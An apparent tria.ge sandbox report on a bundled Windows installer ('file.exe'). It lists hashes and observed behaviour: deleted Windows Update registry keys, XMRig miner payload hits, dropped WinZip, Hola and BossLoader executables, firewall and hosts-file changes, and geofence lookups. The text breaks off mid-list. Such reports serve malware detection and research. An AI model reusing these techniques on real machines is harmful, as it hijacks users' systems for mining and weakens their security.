Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
26/11/2022, 08:19
221126-j7yhtaed66 1025/11/2022, 12:27
221125-pmxnnsbe8t 824/11/2022, 09:51
221124-lvp21seh53 1024/11/2022, 09:44
221124-lqgvvahf3x 10Analysis
-
max time kernel
2707s -
max time network
2718s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
26/11/2022, 08:19
Static task
static1
General
-
Target
file.exe
-
Size
1.4MB
-
MD5
073a3dc0c60492b618f888c5e603fd05
-
SHA1
4de52c57f8f032724452e901120bcf0fbee52902
-
SHA256
f4fcbc524c30e4469464eb1c5641577b1042bd6fb5f44835731a3ee156d29c27
-
SHA512
4262dd0e07f0d083c75607a0a67e20b8b8f85c57aeeba2359cc92731a82ba9d2191482cb3d28c7c8f1163b0d9604bf1cfba5ffe168ad7bb6fc7c1c11c99c0d7f
-
SSDEEP
24576:W+wHtwQBTvwpeNrT2i8k57TujjVx3KClNyOiY:W+sBTopej8Mw3NlNF
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
Modifies system executable filetype association 2 TTPs 12 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\DragDropHandlers\WinZip\ = "{E0D79305-84BE-11CE-9641-444553540000}" winzip64.exe Key created \REGISTRY\MACHINE\Software\Classes\lnkfile\shellex\ContextMenuHandlers\WinZip msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\DragDropHandlers\WinZip msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\DragDropHandlers\WinZip\ = "{E0D79305-84BE-11CE-9641-444553540000}" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinZip winzip64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinZip\ = "{E0D79304-84BE-11CE-9641-444553540000}" winzip64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\DragDropHandlers\WinZip winzip64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinZip\ = "{E0D79304-84BE-11CE-9641-444553540000}" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\lnkfile\shellex\DragDropHandlers\WinZip msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\DragDropHandlers msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinZip msiexec.exe -
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
description pid Process procid_target PID 1160 created 5560 1160 taskmgr.exe 444 PID 1160 created 5560 1160 taskmgr.exe 444 -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 9296 created 7044 9296 svchost.exe 1556 -
XMRig Miner payload 21 IoCs
resource yara_rule behavioral1/memory/3736-186-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/3736-187-0x0000000140343234-mapping.dmp xmrig behavioral1/memory/3736-188-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/3736-189-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/3736-191-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/3736-193-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/3736-194-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/2084-227-0x0000000140343234-mapping.dmp xmrig behavioral1/memory/2084-228-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/2084-229-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/2084-231-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/2084-232-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/2084-241-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/980-268-0x0000000140343234-mapping.dmp xmrig behavioral1/memory/980-269-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/980-270-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/980-272-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/980-274-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/980-275-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/6036-670-0x0000000140343234-mapping.dmp xmrig behavioral1/memory/6036-671-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
Downloads MZ/PE file
-
Drops file in Drivers directory 35 IoCs
description ioc Process File created C:\Windows\system32\drivers\NAVx64\1501000.012\SymEFA64.cat Process not Found File created C:\Windows\system32\drivers\NAVx64\1501000.012\srtsp64.sys Process not Found File created C:\Windows\system32\drivers\NAVx64\1501000.012\SymEFA64.sys Process not Found File created C:\Windows\system32\drivers\NAVx64\1501000.012\SymELAM.sys Process not Found File created C:\Windows\system32\drivers\NAVx64\1501000.012\SymDS64.cat Process not Found File created C:\Windows\system32\drivers\NAVx64\1501000.012\srtspx64.inf Process not Found File created C:\Windows\system32\drivers\NAVx64\1501000.012\SymEFA.inf Process not Found File created C:\Windows\system32\drivers\NAVx64\1501000.012\SymNet.inf Process not Found File created C:\Windows\system32\drivers\NAVx64\1501000.012\SymDS64.sys Process not Found File created C:\Windows\system32\drivers\NAVx64\1501000.012\symELAM.inf Process not Found File created C:\Windows\system32\drivers\NAVx64\1501000.012\ccSetx64.cat Process not Found File created C:\Windows\system32\drivers\NAVx64\1501000.012\symnets.sys Process not Found File created C:\Windows\system32\drivers\NSTx64\7DE06000.01B\ccSetx64.inf Process not Found File created C:\Windows\system32\drivers\NAVx64\1501000.012\SymDS.inf Process not Found File created C:\Windows\system32\drivers\NAVx64\1501000.012\Ironx64.sys Process not Found File created C:\Windows\system32\Drivers\SYMEVENT64x86.INF Process not Found File created C:\Windows\system32\drivers\etc\hosts InstallerGUI.exe File created C:\Windows\system32\drivers\NAVx64\1501000.012\isolate.ini Process not Found File created C:\Windows\system32\drivers\NAVx64\1501000.012\srtspx64.cat Process not Found File created C:\Windows\system32\drivers\NAVx64\1501000.012\SymVTcer.dat Process not Found File created C:\Windows\system32\drivers\NAVx64\1501000.012\Iron.inf Process not Found File created C:\Windows\system32\drivers\NSTx64\7DE06000.01B\isolate.ini Process not Found File created C:\Windows\system32\drivers\NAVx64\1501000.012\ccSetx64.inf Process not Found File created C:\Windows\system32\drivers\NAVx64\1501000.012\ccSetx64.sys Process not Found File created C:\Windows\system32\drivers\NAVx64\1501000.012\srtspx64.sys Process not Found File created C:\Windows\system32\Drivers\SYMEVENT64x86.SYS Process not Found File created C:\Windows\system32\Drivers\SYMEVENT64x86.CAT Process not Found File created C:\Windows\system32\drivers\etc\hosts SubmitDiagInfor.exe File created C:\Windows\system32\drivers\NAVx64\1501000.012\SymELAM64.cat Process not Found File created C:\Windows\system32\drivers\NSTx64\7DE06000.01B\ccSetx64.sys Process not Found File created C:\Windows\system32\drivers\NAVx64\1501000.012\iron.cat Process not Found File created C:\Windows\system32\drivers\NAVx64\1501000.012\srtsp64.cat Process not Found File created C:\Windows\system32\drivers\NAVx64\1501000.012\symnet64.cat Process not Found File created C:\Windows\system32\drivers\NAVx64\1501000.012\srtsp64.inf Process not Found File created C:\Windows\system32\drivers\NSTx64\7DE06000.01B\ccSetx64.cat Process not Found -
Executes dropped EXE 64 IoCs
pid Process 3524 OWT.exe 4468 OWT.exe 3984 winzip27.exe 1824 winzip27.exe 1284 OWT.exe 3160 winzip27.exe 4400 winzip27.exe 1612 CloseFAH.exe 4332 WzPreviewer64.exe 2364 WzPreloader.exe 3444 winzip64.exe 5164 WzCABCacheSyncHelper64.exe 5436 WzUpdater.exe 3732 adxregistrator.exe 5508 ChromeRecovery.exe 4428 adxregistrator.exe 5628 WzBGTComServer64.exe 1540 WZUpdateNotifier.exe 5724 WzBGTools64.exe 5560 winzip64.exe 5648 winzip64.exe 2768 winzip64.exe 5096 WzCABCacheSyncHelper64.exe 260 winzip64.exe 1112 WzCABCacheSyncHelper64.exe 5852 software_reporter_tool.exe 4516 software_reporter_tool.exe 3776 software_reporter_tool.exe 1336 Conhost.exe 1632 OWT.exe 4368 BossLoader - Installer.exe 5584 BossLoader.exe 5864 InstallerGUI.exe 4228 BossLoader.tmp 4552 BossLoader.exe 884 software_reporter_tool.exe 4416 BossLoader.exe 5468 BossLoader.exe 260 Hola-Browser-Agreed-Inst-C-Amb3.exe 1816 Hola-Browser-Agreed-Inst-C-Amb3.exe 3544 SubmitDiagInfor.exe 216 Hola-Setup-x64-1.203.908.exe 808 net_updater64.exe 3692 net_updater64.exe 3428 test_wpf.exe 632 hola_svc.exe 4040 Hola-Setup-x64-1.203.908.exe 4544 hola_svc.exe 2084 7za.exe 5636 idle_report.exe 5864 Hola-Setup-x64-1.203.908.exe 6112 hola_cr.exe 3396 hola_cr.exe 1044 hola_cr.exe 4528 hola_cr.exe 3876 hola_cr.exe 1080 hola_cr.exe 396 hola_cr.exe 180 hola_cr.exe 5752 hola_cr.exe 2960 hola_cr.exe 1456 hola_cr.exe 980 cmd.exe 3404 hola_cr.exe -
Modifies Windows Firewall 1 TTPs 2 IoCs
pid Process 8856 netsh.exe 6820 Process not Found -
Registers COM server for autorun 1 TTPs 64 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E0D79305-84BE-11CE-9641-444553540000}\InProcServer32\ = "C:\\Program Files\\WinZip\\WZSHLS64.DLL" winzip64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CB2B673F-D441-4CD4-AFBE-DC4037CA4220}\InprocServer32\3.5.15230.0\Assembly = "WinZipExpressForOffice, Version=3.5.15230.0, Culture=neutral, PublicKeyToken=86e07f6d9d2175ee" adxregistrator.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\WOW6432Node\CLSID\{444e5a1b-f44c-a742-5f3a-106e50ebdcbf}\LocalServer32\ = "\"C:\\Program Files (x86)\\BossLoader\\BossLoader.exe\" -ToastActivated" BossLoader.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E0D79306-84BE-11CE-9641-444553540000}\InProcServer32 winzip64.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\WOW6432Node\CLSID\{CB2B673F-D441-4CD4-AFBE-DC4037CA4220}\InprocServer32\3.5.15230.0\Assembly = "WinZipExpressForOffice, Version=3.5.15230.0, Culture=neutral, PublicKeyToken=86e07f6d9d2175ee" adxregistrator.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\WOW6432Node\CLSID\{CB2B673F-D441-4CD4-AFBE-DC4037CA4220}\InprocServer32\Assembly = "WinZipExpressForOffice, PublicKeyToken=86E07F6D9D2175EE" adxregistrator.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CB2B673F-D441-4CD4-AFBE-DC4037CA4220}\InprocServer32\Class = "WinZipExpressForOffice.AddinModule" adxregistrator.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9CA9DBE8-C0B1-42c9-B6C7-856BE5756855}\LocalServer32 WzBGTComServer64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FAD61B3D-699D-49B2-BE16-7F82CB4C59CA}\InprocServer32\ = "\"C:\\Program Files (x86)\\Norton AntiVirus\\Engine64\\21.1.0.18\\NavShExt.dll\"" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\WOW6432Node\CLSID\{CB2B673F-D441-4CD4-AFBE-DC4037CA4220}\InprocServer32\ThreadingModel = "Both" adxregistrator.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\CLSID\{CB2B673F-D441-4CD4-AFBE-DC4037CA4220}\InprocServer32\3.5.15230.0\RuntimeVersion = "v4.0.30319" adxregistrator.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9CA9DBE8-C0B1-42c9-B6C7-856BE5756855}\LocalServer32\ = "\"C:\\Program Files\\WinZip\\WzBGTComServer64.exe\"" WzBGTComServer64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A13C2648-91D4-4bf3-BC6D-0079707C4389}\InprocServer32\ = "C:\\Program Files (x86)\\Norton Identity Safe\\Engine64\\2014.6.0.27\\coIEPlg.dll" Process not Found Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E0D79307-84BE-11CE-9641-444553540000}\InProcServer32\ = "C:\\Program Files\\WinZip\\WZSHLS64.DLL" winzip64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E0D79306-84BE-11CE-9641-444553540000}\InProcServer32\ = "C:\\Program Files\\WinZip\\wzshls64.dll" MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CB2B673F-D441-4CD4-AFBE-DC4037CA4220}\InprocServer32\Assembly = "WinZipExpressForOffice, Version=3.5.15230.0, Culture=neutral, PublicKeyToken=86e07f6d9d2175ee" adxregistrator.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CB2B673F-D441-4CD4-AFBE-DC4037CA4220}\InprocServer32\RuntimeVersion = "v4.0.30319" adxregistrator.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CB2B673F-D441-4CD4-AFBE-DC4037CA4220}\InprocServer32\3.5.15230.0\Class = "WinZipExpressForOffice.AddinModule" adxregistrator.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CB2B673F-D441-4CD4-AFBE-DC4037CA4220}\InprocServer32\ = "C:\\Program Files\\WinZip\\adxloader64.WinZipExpressForOffice.dll" adxregistrator.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E0D79304-84BE-11CE-9641-444553540000}\InProcServer32\ = "C:\\Program Files\\WinZip\\WZSHLS64.DLL" winzip64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E0D79304-84BE-11CE-9641-444553540000}\InProcServer32 MsiExec.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\WOW6432Node\CLSID\{CB2B673F-D441-4CD4-AFBE-DC4037CA4220}\InprocServer32\CodeBase = "file:///C:/Program Files/WinZip/WinZipExpressForOffice.DLL" adxregistrator.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\WOW6432Node\CLSID\{CB2B673F-D441-4CD4-AFBE-DC4037CA4220}\InprocServer32\ThreadingModel = "Apartment" adxregistrator.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CB2B673F-D441-4CD4-AFBE-DC4037CA4220}\InprocServer32\3.5.15230.0 adxregistrator.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9CC15BB9-FB90-4D43-BE2D-8FC05F1A454C}\InProcServer32\InprocServer32 = 30004300310031004400300036003100460038003600450043003700420030003900310046003600000034006b00480038004800730024006a0049003d00270045006600280049007a00500069005a004700450043004400430036003e004d0035004b0044005900530055006e0066002800480041002a004c005b00780065005800290079002400660031002c004200460079004000580039002d00410045007d0026004d003500500025005900500072006f006700720061006d005f0044006100740061003e004d0035004b0044005900530055006e0066002800480041002a004c005b007800650058002900790000000000 MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{AB4C7833-A6EC-433f-B9FE-6B14B1A2F836}\InprocServer32\ = "C:\\Program Files (x86)\\Norton Identity Safe\\Engine64\\2014.6.0.27\\coIEPlg.dll" Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E0D7930A-84BE-11CE-9641-444553540002}\LocalServer32 WzPreviewer64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E0D79306-84BE-11CE-9641-444553540000}\InProcServer32\ = "C:\\Program Files\\WinZip\\WZSHLS64.DLL" winzip64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E0D79307-84BE-11CE-9641-444553540000}\InProcServer32 winzip64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E0D79307-84BE-11CE-9641-444553540000}\InProcServer32\ThreadingModel = "Apartment" MsiExec.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\CLSID\{CB2B673F-D441-4CD4-AFBE-DC4037CA4220}\InprocServer32\ = "mscoree.dll" adxregistrator.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CB2B673F-D441-4CD4-AFBE-DC4037CA4220}\InprocServer32\ThreadingModel = "Both" adxregistrator.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FAD61B3D-699D-49B2-BE16-7F82CB4C59CA}\InprocServer32 Process not Found Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E0D7930A-84BE-11CE-9641-444553540002}\LocalServer32\ = "C:\\Program Files\\WinZip\\WzPreviewer64.exe" WzPreviewer64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E0D79306-84BE-11CE-9641-444553540000}\InProcServer32\ThreadingModel = "Apartment" MsiExec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CB2B673F-D441-4CD4-AFBE-DC4037CA4220}\InprocServer32 adxregistrator.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9CC15BB9-FB90-4D43-BE2D-8FC05F1A454C}\InProcServer32\ = "oleaut32.dll" MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9CC15BB9-FB90-4D43-BE2D-8FC05F1A454C}\InProcServer32\ThreadingModel = "Both" MsiExec.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\WOW6432Node\CLSID\{CB2B673F-D441-4CD4-AFBE-DC4037CA4220}\InprocServer32\ = "mscoree.dll" adxregistrator.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\CLSID\{CB2B673F-D441-4CD4-AFBE-DC4037CA4220}\InprocServer32\CodeBase = "file:///C:/Program Files/WinZip/WinZipExpressForOffice.DLL" adxregistrator.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\CLSID\{CB2B673F-D441-4CD4-AFBE-DC4037CA4220}\InprocServer32\ = "C:\\Program Files\\WinZip\\adxloader64.WinZipExpressForOffice.dll" adxregistrator.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\CLSID\{CB2B673F-D441-4CD4-AFBE-DC4037CA4220}\InprocServer32\ThreadingModel = "Apartment" adxregistrator.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9CC15BB9-FB90-4D43-BE2D-8FC05F1A454C}\InProcServer32 MsiExec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A13C2648-91D4-4bf3-BC6D-0079707C4389}\InprocServer32 Process not Found Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A13C2648-91D4-4bf3-BC6D-0079707C4389}\InprocServer32\ThreadingModel = "Apartment" Process not Found Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E0D79304-84BE-11CE-9641-444553540000}\InProcServer32\ = "C:\\Program Files\\WinZip\\wzshls64.dll" MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E0D79304-84BE-11CE-9641-444553540000}\InProcServer32\ThreadingModel = "Apartment" MsiExec.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\CLSID\{CB2B673F-D441-4CD4-AFBE-DC4037CA4220}\InprocServer32\Assembly = "WinZipExpressForOffice, Version=3.5.15230.0, Culture=neutral, PublicKeyToken=86e07f6d9d2175ee" adxregistrator.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CB2B673F-D441-4CD4-AFBE-DC4037CA4220}\InprocServer32\ = "mscoree.dll" adxregistrator.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CB2B673F-D441-4CD4-AFBE-DC4037CA4220}\InprocServer32\3.5.15230.0 adxregistrator.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CB2B673F-D441-4CD4-AFBE-DC4037CA4220}\InprocServer32\3.5.15230.0\CodeBase = "file:///C:/Program Files/WinZip/WinZipExpressForOffice.DLL" adxregistrator.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E0D79305-84BE-11CE-9641-444553540000}\InProcServer32 winzip64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E0D79305-84BE-11CE-9641-444553540000}\InProcServer32\ThreadingModel = "Apartment" MsiExec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E0D79306-84BE-11CE-9641-444553540000}\InProcServer32 MsiExec.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\WOW6432Node\CLSID\{CB2B673F-D441-4CD4-AFBE-DC4037CA4220}\InprocServer32\3.5.15230.0 adxregistrator.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\WOW6432Node\CLSID\{CB2B673F-D441-4CD4-AFBE-DC4037CA4220}\InprocServer32\3.5.15230.0\Class = "WinZipExpressForOffice.AddinModule" adxregistrator.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\WOW6432Node\CLSID\{CB2B673F-D441-4CD4-AFBE-DC4037CA4220}\InprocServer32\ = "C:\\Program Files\\WinZip\\adxloader.WinZipExpressForOffice.dll" adxregistrator.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\CLSID\{CB2B673F-D441-4CD4-AFBE-DC4037CA4220}\InprocServer32\3.5.15230.0\Class = "WinZipExpressForOffice.AddinModule" adxregistrator.exe Key deleted \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\CLSID\{CB2B673F-D441-4CD4-AFBE-DC4037CA4220}\InprocServer32\3.5.15230.0 adxregistrator.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E0D79306-84BE-11CE-9641-444553540000}\InProcServer32\ThreadingModel = "Apartment" winzip64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{784C04A3-2E5A-4E7C-A7F7-7D97E27859AD}\LocalServer32 winzip64.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\WOW6432Node\CLSID\{CB2B673F-D441-4CD4-AFBE-DC4037CA4220}\InprocServer32 adxregistrator.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\WOW6432Node\CLSID\{CB2B673F-D441-4CD4-AFBE-DC4037CA4220}\InprocServer32\Assembly = "WinZipExpressForOffice, Version=3.5.15230.0, Culture=neutral, PublicKeyToken=86e07f6d9d2175ee" adxregistrator.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\WOW6432Node\CLSID\{CB2B673F-D441-4CD4-AFBE-DC4037CA4220}\InprocServer32\RuntimeVersion = "v4.0.30319" adxregistrator.exe -
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 43 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation OWT.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation OWT.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation hola_cr.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation hola_cr.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation winzip64.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation hola_cr.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation hola_cr.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation OWT.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation hola_cr.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation hola_cr.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation hola_cr.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation OWT.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation OWT.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation winzip27.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation BossLoader.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation hola_cr.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation hola_cr.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation hola_cr.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation Hola-Browser-Agreed-Inst-C-Amb3.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation hola_cr.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation OWT.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation winzip64.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation winzip64.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation BossLoader - Installer.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation hola_cr.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation winzip64.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation hola_cr.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation hola_cr.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation hola_cr.exe Key value queried 